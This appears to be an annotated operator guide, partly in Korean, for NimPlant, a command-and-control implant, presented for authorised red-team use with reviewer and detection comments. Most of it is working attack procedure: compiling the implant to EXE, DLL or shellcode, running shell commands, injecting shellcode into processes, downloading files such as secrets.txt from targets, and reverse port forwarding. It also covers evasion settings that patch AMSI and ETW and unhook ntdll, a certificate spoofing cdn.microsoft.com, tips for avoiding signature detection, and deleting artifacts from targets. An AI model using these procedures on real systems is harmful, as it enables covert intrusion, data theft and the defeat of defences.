NimPlant
NimPlant는 Nim으로 작성된 경량 크로스 플랫폼 명령 및 제어(C2) 임플란트입니다. HTTP/HTTPS 통신, 구성 가능한 슬립 간격, 파일 작업 및 쉘코드 실행 기능을 제공합니다.
면책 조항: 이 도구는 승인된 보안 테스트 및 레드팀 작전에만 사용됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에 대한 무단 사용은 불법이며 비윤리적입니다. 공격적 보안 작업을 수행하기 전에 항상 서면 승인을 받으세요.
설치
Server Setup
# Clone the repository
# NOTE(review): this checks out whatever is on the default branch; pin a
# reviewed tag or commit before building anything from it.
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant
# Install Python dependencies for the server
# NOTE(review): install into a dedicated virtual environment so the server's
# packages stay isolated from the system Python.
pip install -r server/requirements.txt
# Install Nim (required for compiling implants)
# On Linux
# NOTE(review): piping a remote script straight into sh executes it unreviewed;
# download it to a file, read it, then run it.
curl https://nim-lang.org/choosenim/init.sh -sSf | sh
# Install Nim dependencies
# NOTE(review): -y answers nimble's prompts automatically, and no package
# versions are pinned here, so the resolved versions can differ between builds.
nimble install -y winim nimcrypto zippy
Compile the Implant
# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
# 0.0.0.0 conventionally means "listen on every interface". The web UI is
# described as reachable at https://server-ip:port/, so limit who can reach
# this address with host firewall rules.
# NOTE(review): confirm how NimPlant interprets this value.
ip = "0.0.0.0"
port = 443
# Presumably the URL paths used for implant registration, tasking and results.
# Detection note: static paths like these are what a proxy or IDS rule can
# match on.
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"
[implant]
# Check-in interval in seconds.
sleepTime = 10
# Random variation applied to the interval, as a percentage.
sleepJitter = 20
# Date after which the implant terminates itself; keep it inside the
# authorised engagement window.
killDate = "2026-12-31"
# Presumably sent as the HTTP User-Agent header. Detection note: a fixed
# User-Agent value is a proxy-log indicator.
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe
# Compile as DLL
python3 NimPlant.py compile -o dll
# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode
# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile
Server Operations
Starting the Server
# Start the NimPlant C2 server
python3 NimPlant.py server
# Server starts listening on configured port
# Web UI available at https://server-ip:port/
Managing Implants
# In the NimPlant server console:
# List active implants
nimplant> list
# Interact with a specific implant
nimplant> interact <implant-id>
# View implant details
nimplant> info
# Kill an implant
nimplant> kill
Commands
Reconnaissance
# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env
# List running processes
nimplant> ps
# Get current working directory
nimplant> pwd
# List directory contents
nimplant> ls C:\Users
File Operations
# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe
# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt
# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt
# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir
# Remove a file
nimplant> rm C:\Windows\Temp\file.exe
# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt
# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt
Execution
# Execute a shell command
nimplant> shell net user
# Execute a command via cmd.exe
nimplant> cmd /c dir C:\
# Run PowerShell command
nimplant> powershell Get-Process
# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2
# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin
Network Operations
# List network connections
nimplant> netstat
# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80
# Stop reverse port forward
nimplant> rportfwd stop 8080
Sleep and Communication
# Change sleep interval (seconds)
nimplant> sleep 30
# Change sleep jitter (percentage)
nimplant> jitter 40
# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40
HTTPS Communication
# Generate self-signed certificate for HTTPS
# -nodes writes server.key without a passphrase, so file permissions are the
# only protection for the private key (e.g. chmod 600 server.key).
# Detection note: a self-signed certificate (issuer equals subject) whose CN
# names a well-known vendor domain is a network indicator that TLS/x509
# certificate logging can flag.
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
-days 365 -nodes -subj "/CN=cdn.microsoft.com"
# Place certificates in the server directory
cp server.key server/
cp server.crt server/
OPSEC Considerations
# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)
# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection
Evasion Configuration
# Additional config.toml evasion options
# A TOML document may define the [implant] table only once: merge these values
# into the existing table instead of appending a second [implant] header.
[implant]
# Check-in interval in seconds and its random variation in percent.
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
[evasion]
# NOTE(review): judging by their names, these flags tamper with AMSI, ETW and
# user-mode ntdll hooks inside the implant's own process -- confirm against the
# project documentation.
# Detection note: telemetry that depends only on those in-process sources can
# be blinded, so defenders should also collect kernel-sourced and network
# telemetry and alert on in-memory modification of amsi.dll / ntdll.dll code.
patchAmsi = true
patchEtw = true
unhookNtdll = true
Logging
# Server logs all interactions
# Logs stored in: server/logs/
# NOTE(review): these logs record engagement activity and presumably command
# output from target hosts, so treat them as sensitive: restrict read access
# and archive them with the engagement evidence.
# View engagement log
cat server/logs/nimplant.log
# Each implant session has its own log
ls server/logs/sessions/
Cleanup
# Terminate all active implants
nimplant> killall
# Individual implant cleanup
nimplant> interact <id>
nimplant> kill
# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill